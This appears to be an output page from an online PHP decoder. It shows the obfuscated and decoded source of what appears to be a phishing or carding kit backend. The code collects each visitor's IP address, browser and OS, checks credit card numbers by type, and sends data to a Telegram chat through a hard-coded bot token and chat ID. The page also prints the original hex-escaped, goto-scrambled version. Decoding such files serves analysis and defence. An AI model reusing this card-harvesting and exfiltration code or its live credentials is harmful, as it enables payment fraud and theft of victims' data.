Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto breFU; RdnFy: function getBrowser() { global $user_agent; $browser = "\x55\15..
Decoded Output download
<?php
goto breFU; RdnFy: function getBrowser() { global $user_agent; $browser = "Unknown Browser"; $browser_array = array("/msie/i" => "Internet Explorer", "/firefox/i" => "Firefox", "/safari/i" => "Safari", "/chrome/i" => "Chrome", "/edge/i" => "Edge", "/opera/i" => "Opera", "/netscape/i" => "Netscape", "/maxthon/i" => "Maxthon", "/konqueror/i" => "Konqueror", "/mobile/i" => "Handheld Browser"); foreach ($browser_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $browser = $value; } } return $browser; } goto rljoC; N2W4Q: function telegram_send($message) { $curl = curl_init(); $api_key = "6036768515:AAGHf1xTn8P-j8W4KGEjaoUMaFyipe6n2qo"; $chat_id = "-1001831372476"; $format = "HTML"; curl_setopt($curl, CURLOPT_URL, "https://api.telegram.org/bot" . $api_key . "/sendMessage?chat_id=" . $chat_id . "&text=" . $message . "&parse_mode=" . $format); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); curl_close($curl); return true; } goto v1XFf; ZZwN2: function getIPAddress() { if (!empty($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } return $ip; } goto VUJx8; v1XFf: $user_os = getOS(); goto jqa4F; r2kBo: $date = gmdate("H:i:s | d/m/Y"); goto oPa49; oPa49: $victim_ip = getenv("REMOTE_ADDR"); goto TAUqD; rljoC: function validatecard($cc) { global $type; $cardtype = array("visa" => "/^4[0-9]{12}(?:[0-9]{3})?$/", "mastercard" => "/^5[1-5][0-9]{14}$/", "amex" => "/^3[47][0-9]{13}$/", "discover" => "/^6(?:011|5[0-9]{2})[0-9]{12}$/"); if (preg_match($cardtype["visa"], $cc)) { $type = "Visa"; return "visa"; } else { if (preg_match($cardtype["mastercard"], $cc)) { $type = "Mastercard"; return "mastercard"; } else { if (preg_match($cardtype["amex"], $cc)) { $type = "Amex"; return "amex"; } else { if (preg_match($cardtype["discover"], $cc)) { $type = "Discover"; return "discover"; } else { return false; } } } } } goto N2W4Q; Cx8IS: session_start(); goto ZZwN2; jqa4F: $user_browser = getBrowser(); goto r2kBo; VUJx8: function getOS() { global $user_agent; $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto RdnFy; breFU: $user_agent = $_SERVER["HTTP_USER_AGENT"]; goto Cx8IS; TAUqD: ?>Did this file decode correctly?
Original Code
<?php
goto breFU; RdnFy: function getBrowser() { global $user_agent; $browser = "\x55\156\153\156\157\167\156\x20\x42\x72\157\167\163\145\162"; $browser_array = array("\57\x6d\x73\151\145\x2f\x69" => "\x49\156\x74\x65\162\156\x65\x74\40\x45\x78\160\x6c\157\162\145\x72", "\x2f\x66\x69\162\x65\146\157\x78\x2f\151" => "\106\x69\162\145\146\157\x78", "\57\x73\141\x66\x61\162\x69\x2f\x69" => "\x53\141\x66\x61\162\151", "\57\x63\150\162\157\x6d\145\57\151" => "\103\x68\162\x6f\155\x65", "\57\x65\x64\x67\145\57\x69" => "\105\x64\147\x65", "\57\x6f\x70\x65\162\141\57\x69" => "\117\x70\145\162\x61", "\57\x6e\x65\164\163\x63\x61\160\x65\x2f\x69" => "\x4e\x65\164\x73\x63\141\160\145", "\57\x6d\x61\170\x74\x68\x6f\x6e\x2f\151" => "\x4d\141\170\x74\150\x6f\156", "\x2f\153\157\156\161\x75\x65\162\x6f\x72\57\x69" => "\x4b\x6f\x6e\x71\165\145\162\157\162", "\57\155\157\142\x69\x6c\x65\x2f\151" => "\110\141\156\x64\x68\145\x6c\144\40\x42\162\157\167\163\145\x72"); foreach ($browser_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $browser = $value; } } return $browser; } goto rljoC; N2W4Q: function telegram_send($message) { $curl = curl_init(); $api_key = "\x36\x30\63\x36\x37\x36\70\x35\x31\x35\72\x41\101\x47\x48\146\x31\170\x54\x6e\70\120\55\x6a\70\127\x34\113\x47\105\x6a\x61\157\125\115\141\x46\x79\151\160\145\x36\156\62\x71\x6f"; $chat_id = "\55\x31\x30\x30\61\x38\63\61\x33\67\62\x34\x37\x36"; $format = "\x48\124\x4d\114"; curl_setopt($curl, CURLOPT_URL, "\150\x74\x74\x70\163\72\57\57\x61\160\151\56\x74\x65\x6c\145\x67\162\x61\155\x2e\x6f\162\x67\57\142\157\164" . $api_key . "\57\x73\x65\156\144\115\x65\163\163\141\147\x65\77\143\x68\x61\164\137\151\x64\x3d" . $chat_id . "\x26\164\x65\x78\x74\x3d" . $message . "\x26\160\141\x72\163\x65\137\155\157\x64\x65\75" . $format); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); curl_close($curl); return true; } goto v1XFf; ZZwN2: function getIPAddress() { if (!empty($_SERVER["\110\124\x54\120\x5f\x43\x4c\x49\x45\x4e\124\137\x49\x50"])) { $ip = $_SERVER["\110\124\124\120\x5f\x43\114\x49\105\116\x54\x5f\111\120"]; } elseif (!empty($_SERVER["\x48\124\x54\x50\x5f\130\137\106\x4f\122\127\101\122\104\x45\104\137\x46\117\x52"])) { $ip = $_SERVER["\110\x54\x54\120\x5f\130\x5f\x46\x4f\122\x57\101\x52\x44\105\x44\137\x46\x4f\122"]; } else { $ip = $_SERVER["\x52\x45\x4d\117\x54\105\137\101\x44\x44\122"]; } return $ip; } goto VUJx8; v1XFf: $user_os = getOS(); goto jqa4F; r2kBo: $date = gmdate("\x48\72\x69\x3a\163\x20\174\x20\144\57\155\57\x59"); goto oPa49; oPa49: $victim_ip = getenv("\x52\x45\115\x4f\x54\105\137\x41\104\104\x52"); goto TAUqD; rljoC: function validatecard($cc) { global $type; $cardtype = array("\x76\151\163\141" => "\x2f\136\x34\133\x30\x2d\71\x5d\x7b\x31\x32\175\50\x3f\x3a\133\60\55\x39\x5d\173\x33\x7d\51\x3f\x24\x2f", "\x6d\x61\163\164\145\x72\143\x61\162\144" => "\x2f\136\x35\x5b\61\55\65\x5d\133\x30\x2d\71\x5d\x7b\x31\x34\x7d\x24\x2f", "\x61\x6d\x65\170" => "\x2f\136\x33\133\x34\67\135\x5b\x30\55\x39\135\173\x31\x33\175\x24\57", "\144\151\x73\143\157\x76\x65\x72" => "\x2f\x5e\66\x28\x3f\72\60\x31\x31\174\x35\x5b\60\x2d\71\135\173\62\175\x29\133\60\x2d\x39\x5d\173\x31\62\x7d\x24\57"); if (preg_match($cardtype["\x76\151\x73\141"], $cc)) { $type = "\126\x69\163\141"; return "\166\151\x73\141"; } else { if (preg_match($cardtype["\155\x61\x73\x74\145\162\143\x61\x72\x64"], $cc)) { $type = "\115\141\163\164\x65\162\x63\141\x72\x64"; return "\x6d\x61\x73\x74\x65\162\x63\x61\x72\x64"; } else { if (preg_match($cardtype["\141\155\x65\170"], $cc)) { $type = "\x41\x6d\145\170"; return "\141\x6d\145\170"; } else { if (preg_match($cardtype["\x64\151\163\x63\x6f\x76\x65\162"], $cc)) { $type = "\104\151\163\x63\x6f\x76\x65\162"; return "\144\151\x73\x63\157\166\145\162"; } else { return false; } } } } } goto N2W4Q; Cx8IS: session_start(); goto ZZwN2; jqa4F: $user_browser = getBrowser(); goto r2kBo; VUJx8: function getOS() { global $user_agent; $os_platform = "\x55\x6e\x6b\156\x6f\x77\x6e\x20\x4f\123\40\x50\x6c\x61\x74\x66\157\x72\x6d"; $os_array = array("\57\167\x69\x6e\144\x6f\167\x73\x20\156\164\x20\x31\60\57\151" => "\x57\151\x6e\144\157\167\163\x20\61\x30", "\x2f\167\151\x6e\x64\157\167\x73\x20\x6e\164\40\66\56\63\x2f\151" => "\x57\151\156\144\x6f\167\163\40\70\x2e\x31", "\57\x77\x69\x6e\x64\157\167\x73\x20\x6e\164\40\x36\x2e\62\57\151" => "\x57\x69\x6e\x64\157\167\163\40\70", "\57\167\x69\156\x64\157\167\x73\40\x6e\x74\40\66\56\61\57\x69" => "\127\x69\156\144\x6f\167\x73\40\x37", "\x2f\167\x69\x6e\x64\157\167\163\40\156\x74\40\x36\56\x30\x2f\x69" => "\x57\151\x6e\144\157\x77\163\x20\x56\x69\x73\x74\141", "\57\167\151\x6e\144\x6f\x77\163\x20\156\164\40\x35\x2e\x32\x2f\151" => "\127\151\156\144\x6f\167\x73\40\123\145\162\166\145\x72\x20\62\x30\x30\63\57\130\120\40\170\x36\x34", "\x2f\x77\x69\x6e\144\x6f\167\x73\x20\x6e\164\40\65\56\61\x2f\151" => "\127\x69\156\144\157\x77\163\x20\x58\120", "\x2f\x77\151\x6e\144\x6f\167\x73\x20\170\160\57\151" => "\127\x69\156\x64\157\x77\x73\x20\x58\x50", "\57\x77\151\156\x64\157\x77\x73\40\156\164\40\65\x2e\60\57\151" => "\x57\151\156\144\157\167\163\40\x32\60\60\x30", "\57\x77\x69\x6e\x64\x6f\x77\x73\40\155\x65\x2f\151" => "\x57\151\x6e\x64\x6f\x77\163\40\115\x45", "\57\167\x69\x6e\71\70\57\x69" => "\127\x69\x6e\x64\157\167\x73\x20\71\70", "\x2f\167\x69\x6e\71\x35\x2f\151" => "\127\151\156\144\x6f\167\x73\40\x39\x35", "\57\x77\151\x6e\61\x36\57\151" => "\127\151\156\x64\x6f\167\163\40\63\x2e\61\61", "\x2f\x6d\x61\143\x69\x6e\164\157\163\150\x7c\155\x61\143\x20\x6f\163\40\x78\57\x69" => "\x4d\141\x63\x20\117\123\x20\x58", "\x2f\155\x61\143\137\x70\x6f\167\145\162\x70\x63\x2f\151" => "\115\x61\x63\40\x4f\123\40\71", "\x2f\x6c\151\156\x75\170\x2f\151" => "\x4c\151\156\165\x78", "\x2f\x75\142\165\x6e\x74\x75\x2f\151" => "\x55\x62\165\156\x74\x75", "\x2f\151\x70\150\157\x6e\145\x2f\151" => "\151\x50\150\x6f\x6e\x65", "\x2f\151\160\157\144\57\151" => "\x69\x50\157\x64", "\57\x69\x70\x61\x64\57\151" => "\151\120\141\x64", "\x2f\x61\x6e\144\x72\157\151\144\x2f\x69" => "\x41\156\x64\162\157\151\144", "\57\x62\x6c\x61\x63\153\x62\145\162\162\171\57\x69" => "\x42\x6c\141\x63\x6b\102\x65\x72\x72\x79", "\x2f\167\145\142\x6f\x73\57\151" => "\x4d\157\x62\x69\154\145"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto RdnFy; breFU: $user_agent = $_SERVER["\110\x54\124\x50\137\125\123\105\x52\137\101\x47\x45\116\x54"]; goto Cx8IS; TAUqD: ?>Function Calls
| None |
Stats
| MD5 | 65359ceb85d5cebadf18c90bc8435841 |
| Eval Count | 0 |
| Decode Time | 62 ms |